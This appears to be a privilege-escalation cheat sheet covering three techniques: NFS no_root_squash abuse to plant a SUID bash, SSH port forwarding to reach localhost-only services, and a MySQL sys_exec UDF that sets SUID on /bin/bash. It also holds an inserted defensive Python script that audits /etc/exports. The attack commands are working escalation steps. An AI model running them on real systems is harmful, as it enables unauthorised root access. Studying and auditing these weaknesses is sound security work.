NFS & INTERNAL SERVICES

NFS no_root_squash
  Root on NFS = root on target — place a SUID copy of /bin/bash on the share.
  Check:
    cat /etc/exports
  If no_root_squash is set: mount the share from a host where you are root and create the SUID binary there.
  Example output:
    cat /etc/exports
    /home/backup *(rw,no_root_squash)
  On attacker:
    mount -t nfs 10.10.10.5:/home/backup /tmp/nfs
    cp /bin/bash /tmp/nfs/rootbash
    chmod +s /tmp/nfs/rootbash
  On target:
    /home/backup/rootbash -p
    # whoami
    root
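As an added defender-side check (not part of the original cheat sheet), the following Python script audits a constructed /etc/exports and reports every export/client pair where a remote root keeps uid 0. It handles the exports(5) cases that make a manual `cat /etc/exports` easy to misread: `-opt` default tokens, bare hosts (which get nfsd defaults, i.e. root_squash), and the `host (opts)` space typo that exportfs treats as exporting the options to everyone.

```python
import re
import shlex

# Constructed sample /etc/exports for the demo (not taken from any real host).
SAMPLE_EXPORTS = """\
# backups for the build farm
/home/backup *(rw,no_root_squash)
/srv/data    -rw,sync 10.10.0.0/24 10.10.0.7(no_root_squash)
/srv/web     10.10.0.9 (rw,no_root_squash)
/srv/safe    10.10.0.9(rw,all_squash)
"""

# A client token is "host", "host(opts)" or, after the space typo, "(opts)".
CLIENT_RE = re.compile(r"^([^(]*)(?:\((.*)\))?$")

def parse_exports(text):
    """Return [(path, client, options)] with one tuple per client of each line."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        tokens = shlex.split(line)
        path, defaults = tokens[0], []
        for tok in tokens[1:]:
            if tok.startswith("-"):               # "-opt,opt" = defaults for later clients
                defaults = tok[1:].split(",")
                continue
            host, opts = CLIENT_RE.match(tok).groups()
            # "host (opts)": exportfs reads "(opts)" as a separate client with an
            # empty host, so those options apply to everyone ("*").
            client = host or "*"
            options = defaults + (opts.split(",") if opts else [])
            entries.append((path, client, options))
    return entries

def root_is_squashed(options):
    """nfsd default is root_squash; all_squash squashes root as well."""
    if "all_squash" in options:
        return True
    squashed = True
    for opt in options:                           # last explicit setting wins
        if opt in ("root_squash", "no_root_squash"):
            squashed = opt == "root_squash"
    return squashed

def audit_exports(text):
    """List every export where a remote root is not mapped to nobody."""
    findings = []
    for path, client, options in parse_exports(text):
        if not root_is_squashed(options):
            scope = "everyone" if client == "*" else client
            findings.append(f"{path}: root not squashed for {scope} ({','.join(options)})")
    return findings

if __name__ == "__main__":
    for finding in audit_exports(SAMPLE_EXPORTS):
        print("WARN", finding)
```

Run it against the real file with `audit_exports(open("/etc/exports").read())`; any finding for "everyone" is the exact condition the cheat sheet above abuses.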
Internal services
  Services bound only to 127.0.0.1 — not reachable from outside, may be unpatched; port forward to reach them.
  Check:
    netstat -tulnp
    ss -tulnp
  Example output:
    netstat -tulnp
    127.0.0.1:8080 python3 <- internal web app
    127.0.0.1:3306 mysqld  <- internal MySQL
  SSH tunnel to access:
    ssh -L 8080:127.0.0.1:8080 user@target
  Browse http://127.0.0.1:8080 on the attacker machine.
MySQL as root
  Database process running as root — a UDF (User Defined Function) gives command execution as that user.
  Check:
    ps aux | grep mysql
    mysql -u root -p
  If mysqld runs as root and the sys_exec UDF is already loaded: SELECT sys_exec('chmod u+s /bin/bash');
  otherwise the UDF library must be loaded first (UDF exploit).
  Example output:
    ps aux | grep mysql
    root 1234 /usr/sbin/mysqld
    (MySQL running as root!)
    mysql -u root -p
    SELECT sys_exec('chmod u+s /bin/bash');
    bash -p
    # whoami
    root